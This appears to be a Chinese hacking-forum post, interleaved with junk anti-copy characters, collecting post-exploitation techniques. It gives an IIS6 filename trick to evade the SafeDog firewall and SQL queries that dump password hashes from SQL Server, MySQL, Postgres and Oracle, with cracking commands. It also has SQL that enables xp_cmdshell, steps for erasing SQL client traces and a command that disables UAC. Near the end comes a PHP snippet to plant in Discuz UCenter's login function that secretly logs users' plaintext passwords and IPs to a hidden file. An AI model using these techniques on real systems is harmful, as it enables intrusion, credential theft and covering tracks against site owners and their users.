/ k6 {" U- X- e& Z* S8 B3 \利用II6文件解析漏洞绕过安全狗代码:+ y& z s" p% v& F' m
;antian365.asp;antian365.jpg2 [" i# T* H) u5 o
1 i* r9 m& D+ J/ ^ s3 |各种类型数据库抓HASH破解最高权限密码!, _! e# Q( x/ n5 X" T
1.sql server2000; O3 B6 `2 u& U5 O( T$ j2 V
SELECT password from master.dbo.sysxlogins where name='sa'
1 X; Z1 k' i* I0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 A! g' O( G0 i- ~- r# x2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
! k! i' I& X% W+ x( b; L1 p: i3 [( h$ |; G; X
0×0100- constant header% f- q( C& }4 m K
34767D5C- salt
( m) y8 |, I% P9 ?0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
h7 [" a6 ~: U, f0 ?2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
6 }$ J, u# y4 q! tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
8 E2 C7 w/ t/ y# ?) M* fSQL server 2005:-
D: Q- u4 \9 x: t" ySELECT password_hash FROM sys.sql_logins where name='sa'1 d& `/ N# D, j# _* n3 o: a
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F, a2 f8 r5 v6 b# L
0×0100- constant header; c% Y4 W% {4 m
993BF231-salt5 s2 u$ J: @0 W6 S0 w! H6 k
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash- s8 ]* r# J8 A9 E$ [% V
crack case sensitive hash in cain, try brute force and dictionary based attacks.' M2 j0 h. g! G# s
. R0 f+ J6 X% f; t3 ^# T7 Oupdate:- following bernardo’s comments:-7 i5 C" P0 Q6 |6 ]$ o, X9 x
use function fn_varbintohexstr() to cast password in a hex string.3 ]$ `+ f, r9 I q* C8 }1 E
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins0 ~# B" g6 L) Z! M9 _; G
- s. p& W7 k( m% K8 a) j
MYSQL:-
' q4 d' E( Y" a1 J4 t( T8 d z
+ U9 B) V8 |6 d' t3 IIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
7 z6 J( n5 }' {7 L1 B/ S0 ], U
9 `) s3 }" {! [1 p+ `& U*mysql < 4.1
, g' z A+ K. N1 {1 V0 y$ h! f" e% S$ P2 P1 S( _4 w3 o
mysql> SELECT PASSWORD(‘mypass’); S2 j! a1 w5 J2 v! g% S6 X# |
+——————–+ E5 o. Z B! X+ ?! _
| PASSWORD(‘mypass’) |
% d7 E* k+ E9 h; \. g6 C+——————–+8 q: {! f& i' P O/ ?# b$ E r
| 6f8c114b58f2ce9e |
. K3 Y+ |/ A$ N- r+——————–+" b" b6 s6 Y* Q* X* }0 U, n
& G, v; g! F. `. ~- r3 I; R# F*mysql >=4.1
. i/ Z2 B1 ^% y$ E" z# f
8 e# W1 Q. m+ _mysql> SELECT PASSWORD(‘mypass’);
+ K# |. i$ O- U' G4 T# D+——————————————-+
3 l i* n. q) M. ]" E3 C| PASSWORD(‘mypass’) |, @ _8 R/ _9 N
+——————————————-+
3 o: ]& T/ Z' D C8 X| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
7 y8 o! O+ g6 B' |9 m# x: j+——————————————-+
3 w- Z1 Q9 e6 E- E$ ^; t# b7 n9 ~# r* g
Select user, password from mysql.user+ g- H' I1 N% h+ D1 Y
The hashes can be cracked in ‘cain and abel’
1 _7 p8 d7 D1 X" _3 c8 H/ J: a5 k! u9 u- \, s
Postgres:-1 A! m; n3 N" T, @
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)5 V6 U$ t! a5 U" b4 Y
select usename, passwd from pg_shadow;
) E' ?& W. ]1 ousename | passwd; J2 n8 L7 X- @0 {8 j
——————+————————————-
9 ~. R# G; G! H& qtestuser | md5fabb6d7172aadfda4753bf0507ed4396/ t* b( J' s! W; q+ O, f/ H8 n
use mdcrack to crack these hashes:-
* N! b2 m6 I" \* a1 ~7 R1 L- w$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43966 j* ?0 O1 D u9 Q% z
+ D) S1 U, M7 ?2 i3 gOracle:-
_% M5 ]3 o |1 U6 `2 lselect name, password, spare4 from sys.user$' I/ c1 y9 ^- V
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g; I2 V0 O! I% G
More on Oracle later, i am a bit bored….
* H$ n5 s( R' n$ x f7 A8 O
! {, [8 L& m7 J! s
. I* B4 C3 Q- `在sql server2005/2008中开启xp_cmdshell
" ~, c$ J8 N% h-- To allow advanced options to be changed.
( V/ }- Q3 p0 N6 |! \4 sEXEC sp_configure 'show advanced options', 18 \" ]3 Z, u4 R
GO2 ^# Y$ b. M; ^( L) q: L
-- To update the currently configured value for advanced options.1 X% w( V* H& e5 q% W
RECONFIGURE- E8 x, w# U! O5 B( c
GO3 e- P. G) I+ b* } f4 h
-- To enable the feature.2 j- @. \) C& n% k; o
EXEC sp_configure 'xp_cmdshell', 1
: i- d4 y4 t$ Y8 n; g2 GGO; b# V" T, ~ ~! g6 [; D
-- To update the currently configured value for this feature.4 U4 D1 {9 @* Z! a* ?
RECONFIGURE
: ?- O1 C, B9 J$ Y ?% K2 WGO, q4 }5 z. L: x/ \8 @
SQL 2008 server日志清除,在清楚前一定要备份。
9 I" l" N" [+ [如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
! |+ T- w4 J& x3 f* c; D& r5 JX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
# ^8 A% D, Y7 A5 u- x& }4 m5 i, B! E: i1 J$ y- H) h
对于SQL Server 2008以前的版本:) S4 F. h/ f! W2 i. `$ H8 p# e
SQL Server 2005:3 W2 |/ w7 Y* m8 f! S
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
+ F# L8 C J* G9 Y' CSQL Server 2000:! s) N$ F/ v" m
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
/ \" U8 R2 x% f8 c5 P) k$ Y. k
) W9 d$ r2 |, t! r9 C# x+ W本帖最后由 simeon 于 2013-1-3 09:51 编辑, S* {7 a# Q: v2 }' c. t: m8 Q
; v7 q0 z8 I( b
1 D& n9 ^3 [7 I3 s: [: ?
windows 2008 文件权限修改: n7 {5 c# W4 V! m1 S! y
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; F; [$ x* P5 j4 G
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
; l! q; l4 w2 `0 @3 E1 ~一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 [) Y- i8 c4 a5 u, P7 n; r8 M
1 n+ u, E7 j [7 k- OWindows Registry Editor Version 5.00
1 j# N4 U) ^+ N1 c+ o. G[HKEY_CLASSES_ROOT\*\shell\runas]! o+ B: ^+ G* r( C
@="管理员取得所有权"
8 I3 {* T% ~) m9 `+ t$ _"NoWorkingDirectory"="". J3 S/ k5 d& C! |6 _( o1 {& K6 }
[HKEY_CLASSES_ROOT\*\shell\runas\command]2 T% d H) E8 n7 U( g9 n( D% i
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 t/ _: ?& E( R2 `- b
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- C, z" `1 _; L9 j7 P' x& t
[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ u; }9 R# k2 a5 l. G# k
@="管理员取得所有权"
# Q8 \) L; D+ ^( T"NoWorkingDirectory"=""( A" [: b/ b- t( h6 M0 ?: W& {* ]
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]+ w- K) q% R2 ?6 I+ `! P3 M& z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ I7 U6 T& b) ]1 y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"$ O* j* r. l8 Q5 d. @' Q% Z% X$ f [4 g
3 b- V9 E; R; K$ N8 K; s- b
[HKEY_CLASSES_ROOT\Directory\shell\runas]+ l& b/ Q; A* R% w4 m
@="管理员取得所有权"6 R7 y1 v0 i: u: s* p
"NoWorkingDirectory"=""
4 g$ @6 r1 H; S3 ?[HKEY_CLASSES_ROOT\Directory\shell\runas\command]9 M+ \3 p; [' H2 o& f; h
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"& ?6 x7 U) b. C( r% e
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) u5 \9 r8 C: s/ ~, f; Q/ C- U4 U9 m! Z
7 Z; O$ Z- s7 Y- \1 @win7右键“管理员取得所有权”.reg导入
& |6 X1 g2 X- s& E3 E& F B二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
+ `* a+ t, U {1 h! W3 n/ g1、C:\Windows这个路径的“notepad.exe”不需要替换; ]8 O7 y6 o5 I, }
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
* F2 O' m. M: Q* `' |$ ^3、四个“notepad.exe.mui”不要管
# Z# n* G' z X. [4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和% e. E6 M7 A3 h' J
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
& l' N( k/ n i替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
( C/ `2 i3 R5 k d. S. H替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
' ]8 K; t$ ~, [- Awindows 2008中关闭安全策略: ) V% o1 h3 R- h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. [8 s" b4 s- I$ X2 P修改uc_client目录下的client.php 在; e* D8 c, @: e4 G
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {/ R# _" r# x- v
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
$ V" W1 ]$ x, Y4 {' _- N& | K你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw" v5 d! k" |5 [+ ^: z/ [2 r
if(getenv('HTTP_CLIENT_IP')) {
* t( x. n9 O# B, h! [$onlineip = getenv('HTTP_CLIENT_IP'); c1 {$ c0 d# B `+ o! X
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {, z, n3 f: S( ?) V2 t3 ^
$onlineip = getenv('HTTP_X_FORWARDED_FOR');) Z9 o! M9 G% e$ }; E% v
} elseif(getenv('REMOTE_ADDR')) {
5 M o, e$ j3 W3 G# X$onlineip = getenv('REMOTE_ADDR');2 W" ? h _( o5 \* Z
} else {1 y3 `( P+ H; V) m. n1 C3 i
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
: x) ?/ h# Y* _7 Q2 g, ?; {}( }5 P0 N, n6 c; L! ~4 V3 ?' }
$showtime=date("Y-m-d H:i:s");7 F% m7 S: j1 W/ E0 m* @; k
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
. i3 s5 t$ T9 z $handle=fopen('./data/cache/csslog.php','a+');
6 ?) Q5 N" s) E& L) C: b! Z0 U $write=fwrite($handle,$record); |